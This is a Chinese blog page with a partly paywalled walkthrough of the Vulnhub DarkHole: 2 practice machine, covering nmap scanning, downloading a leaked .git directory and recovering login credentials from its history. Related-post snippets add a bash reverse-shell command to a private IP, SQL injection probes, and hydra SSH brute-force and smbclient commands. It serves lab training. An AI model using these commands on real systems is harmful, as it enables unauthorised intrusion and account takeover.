Vulnhub-DARKHOLE: 2

最新推荐文章于 2025-05-07 16:02:22 发布

原创

最新推荐文章于 2025-05-07 16:02:22 发布 · 385 阅读

1 ·

CC 4.0 BY-SA版权

文章标签：

#安全 #网络安全 #web安全

本文详述了一次渗透测试的过程，包括通过扫描发现靶机，利用git源码泄露获取登录凭证，进行SQL注入获取数据库信息，通过SSH连接并端口转发，最终反弹shell并实现提权。

一、概要

靶机地址：192.168.64.137
攻击机地址：192.168.64.128
靶机下载地址：https://download.vulnhub.com/darkhole/darkhole_2.zip

二、主机发现

扫描局域网主机，找到靶机ip

三、信息收集

1、git源码泄露

nmap扫描一下，22端口ssh服务和80端口web服务是开着的

根据扫描的信息显示，web服务是有git源码泄露的

使用wget将泄露的git源码下载下来

wget -r http://192.168.64.137:80/.git/

2、git log查看日志

使用git log查看日志

明显发现对login.php做了修改

添加了具有默认登录凭证的的login.php文件

3、git show得到账号密码

git show查看一下

得到账号密码

mail:lush@admin.com
password:321

登录成功

最低0.47元/天解锁文章

确定要放弃本次机会？

福利倒计时

: :

立减 ¥

普通VIP年卡可用

立即使用

Re1_zf

关注关注

1
点赞
踩
1

收藏

觉得还不错? 一键收藏
0
评论
分享

复制链接

分享到 QQ

分享到新浪微博

扫一扫
举报

举报

专栏目录

DarkHole_2

追求卓越，技术流~

01-14

1736

文章目录靶机环境一、信息收集二、漏洞利用三、权力提升总结靶机环境攻击机：kali IP：192.168.247.129 靶机：DarkHole_2 IP：192.168.247.131 一、信息收集输入：nmap -A -T4 -sV -p- 192.168.247.131 Starting Nmap 7.92 ( https://nmap.org ) at 2022-01-14 06:45 EST Nmap scan report for 192.168.247.131 Host is u

靶机：darkhole_2

weixin_50339323的博客

09-09

1648

一、信息搜集 1. 获取IP nmap -sP 192.168.8.0/24 获取的IP：192.168.8.139 2. 扫描IP端口服务 nmap -sC -sV 192.168.8.139 3.目录探测： gobuster dir -q -u http://192.168.8.139 -w /usr/share/seclists/Discovery/Web-Content/common.txt 二、漏洞挖掘 1. 进入到网页访问 192.168.8.139...

参与评论您还未登录，请先登录后发表或查看评论

DarkHole_2靶机通关姿势保姆级教程（少爷/公主们请阅）

最新发布

ping204568238的博客

05-07

1031

可以用它构造http request报文，且可以解析服务器返回的http response，额外还支持cookie特性，可以用curl完成web浏览器的基本功能。单独执行 last 指令，它会读取位于 /var/log/目录下，名称为 wtmp 的文件，并把该文件记录登录的用户名，全部显示出来。每个用户在系统中的账户都对应于此文件中的一条记录，这些记录定义了用户账户的各种属性。好家伙，内容全不见了。页面数据发生了改变，说明它将我们输入的数据代入到了数据中进行查询，然后将对应查询的结果显示在了浏览器上。

[渗透测试学习靶机05] vulnhub靶场 DarkHole: 2

weixin_47112073的博客

10-19

1819

vulnhub靶场 DarkHole: 2，难度：困难级别

【Vulnhub靶场】DARKHOLE: 2

DG_s1mple

03-23

1856

环境准备下载靶机导入到vmware 攻击机IP为：192.168.2.18 靶机的IP为：192.168.2.16 信息收集我们首先使用nmap扫描一下靶机开放的端口信息发现只开放了ssh跟http服务，我们首先访问一下他的网站有一个登录界面，其他并无什么有用信息渗透开始网站页面没有什么有用信息，我们扫描一下网站的目录有.git泄露，我们使用工具把它下载下来看看git的日志发现有修改过login.php文件，我们回到这次缓存获得网站后台的账号密码，我们去登录一下发现这里

VulnHub-DarkHole_2靶机渗透教程

苏生要努力

04-23

1276

直接使用VMware导入打开就行注意：靶机的网络连接模式必须和kali一样，让靶机跟kali处于同一网段，这样kali才能扫出靶机的地址。

Vulnhub-DARKHOLE: 1渗透

laoyanCZ的博客

12-02

1387

由于在做靶机的时候，涉及到的渗透思路是非常的广泛，所以在写文章的时候都是挑重点来写，尽量的不饶弯路。具体有不不懂都的可以直接在文章下评论或者私信博主如果不会导入Vulnhub靶机和配置网络环境的话，请点我直达发车文章！👉本文靶机下载连接-戳我直接下载！👈。

VulnHub-DarkHole_1靶机渗透教程

苏生要努力

04-22

796

直接使用VMware打开就行导入成功，打开虚拟机，到此虚拟机部署完成！注意：靶机的网络连接模式必须和kali一样，让靶机跟kali处于同一网段，这用kali才能扫出主机地址。

vulnhub-DarkHole 1-靶场-打靶记录

lcc001114的博客

06-15

860

这里我们登录进去修改密码点change抓包，发现id=2，咱么大胆猜测一下管理员账户的 id=1，那么我们尝试抓包越权修改管理员密码。发现第一个无限注册的漏洞（靶场没卵用），后端只校验用户名/邮箱/在数据库重没重复，并没有验证码进行注册限制。接下来用注册好的账号登录，在拦截登录第二个包发现个熟悉的身影adshboard.php并且携带id。更改环境变量，等执行./toto时会执行id，执行id时就会执行我们的/bin/bash。正常来讲应该是成功了，但这却失败了可能是蚁剑的原因，反弹到kali机上试试。

Vulnhub--DarkHole:2

weixin_45168704的博客

06-14

327

DarkHole2

vulnhub之darkhole_2

weixin_54431413的博客

07-04

881

首先进行了下载了.git，对其中各个版本源码来审计，拿到后台登录权限，之后利用sql注入拿到jhead的密码。通过对.bash_history的查看，发现了本地执行用户为lucy的9999的命令执行漏洞，水平提权到lucy，通过对lama的暴力破解拿到root，通过lucy的sudo提权...

Vulnhub_Darkhole_2

qq_45434762的博客

12-04

671

本文内容涉及程序/技术原理可能带有攻击性，仅用于安全研究和教学使用，务必在模拟环境下进行实验，请勿将其用于其他用途。因此造成的后果自行承担，如有违反国家法律则自行承担全部法律责任，与作者及分享者无关。主机信息kali：192.168.31.136 Darkhole_2：192.168.31.72信息收集使用netdicover发现目标主机IP为192.168.31.72然后使用nmap对目标机器进...

DARKHOLE: 2

weixin_45042115的博客

10-05

1986

信息收集靶机下载地址为：vulnhub-DARKHOLE: 2 今日的靶机漏洞练习 kali ：100.100.100.131/24 靶机：100.100.100.132/24 依旧使用nmap神器对局域网主机开放服务端口进行扫描，瞅瞅有没有可以利用端口 nmap -v -T4 -sC -sV -p- 100.100.100.0/24 发现有100.100.100.132 主机有wbe页面这个应该就此此次的目标了，对它单独的扫描一次，收集更多信息发现开放22端口和80端口，即对应的远程连接

Vulnhub靶机：DARKHOLE_ 2

LainWith的博客

09-14

1545

系列DarkHole（此系列共2台）发布日期：2021年9月3日提示：不要浪费时间进行暴力破解；使用Vmware虚拟机难度：中目标：取得 root 权限 + 2 Flag主机发现端口扫描信息收集Git 库泄漏SQL注入本地端口转发本地信息收集密码爆破水平提权Root提权1、2。

DarkHole: 2 vulnhub walkthrough

xdeclearn的博客

09-08

630

主机和端口发现： ➜ ~ nmap -sn 192.168.143.0/24 Host is up (0.00010s latency). Nmap scan report for 192.168.143.206 ➜ ~ nmap -T4 -v -p- 192.168.143.206 PORT STATE SERVICE 22/tcp open ssh 80/tcp open http 访问web服务，有一个登录页面：尝试注入失败，于是dirb爆破一下目录：发现了git目录，于是使用

Vulnhub之DARKHOLE: 2渗透测试

Bird&Bird

01-11

4072

目录1、靶机概述2、信息搜集分析git源码SQL注入获取losy用户shell提权到root 1、靶机概述 Description Difficulty:Hard This works better with VMware rather than VirtualBox Hint: Don’t waste your time For Brute-Force kali：192.168.110.128 靶机：192.168.110.137 2、信息搜集首先探测靶机IP地址扫一下端口和服务，可知靶机只开启了2

VulnHub-DarkHole_2靶机实战(超详细保姆级教程)

精品博客,你值得一看~

08-13

8409

记得我们查看过9999端口运行的程序，当我们看到源代码的内容时，我们看到这允许远程命令执行。bash -c ‘bash -i >& /dev/tcp/192.168.184.156/9001 0>&1’ #记得修改你的IP。id=1' and 1=2 --+ #页面信息消失,说明id的闭合为单引号。到此,我们就可以进行ssh连接了.下面是拓展工具注入的方式.着急看结果的宝宝们可以直接移步下面的ssh连接步骤.

DARKHOLE 2

Czheisenberg的博客

02-18

857

vulnhub靶场——DarkHole 2 WriteUp

darkhole2

qq_62144749的博客

09-02

529

vulnhub darkhole2

vulnhub KB-VULN: 2

02-06

### VulnHub KB-VULN:2 下载和相关信息 #### 靶机概述 KB-VULN:2 是由 VulnHub 提供的一个虚拟机镜像，旨在帮助安全研究人员练习渗透测试技能。该靶机包含了多个已知的安全漏洞和服务配置错误，允许用户通过各种技术手段获取系统的控制权限。 #### 下载链接 KB-VULN:2 的官方下载页面位于 VulnHub 官方网站上[^1]。访问此链接可以找到详细的描述以及 OVA 文件的下载选项，适用于 VirtualBox 或 VMware 虚拟化平台。 #### 主要服务端口扫描结果通过对目标机器进行网络扫描发现开放的服务如下： - **SSH (TCP/22)**：用于远程登录管理。 - **SMB/CIFS (TCP/445)**：运行着版本为 4.7.6 的 Samba smbd，在工作组模式下提供文件共享功能[^2]。 #### 可能存在的漏洞点根据公开资料整理得出可能存在的几个攻击面： - SMB 协议可能存在未授权访问或弱密码问题。 - SSH 登录界面可尝试字典攻击破解合法账户凭证。 - 利用 Docker 容器特性实现进一步提权操作[^5]。 #### 渗透流程提示为了成功完成挑战并获得 Flag 文件内容，建议按照以下思路探索： - 使用 `hydra` 工具暴力猜测常见用户名与密码组合来爆破 SSH 和其他潜在入口； - 枚举 SMB 共享资源目录结构寻找敏感数据泄露线索； - 探索本地 LXC/LXD 环境是否存在越界调用风险以达成最终目的； ```bash # 执行 nmap 扫描探测存活主机及其开启的服务 nmap -A <target_ip> # 尝试连接到 SMB 服务器查看可用资源共享情况 smbclient -L //<target_ip> -U% # 对指定账号实施 hydra 字典攻击模拟非法入侵行为 hydra ssh://<username>@<target_ip> ```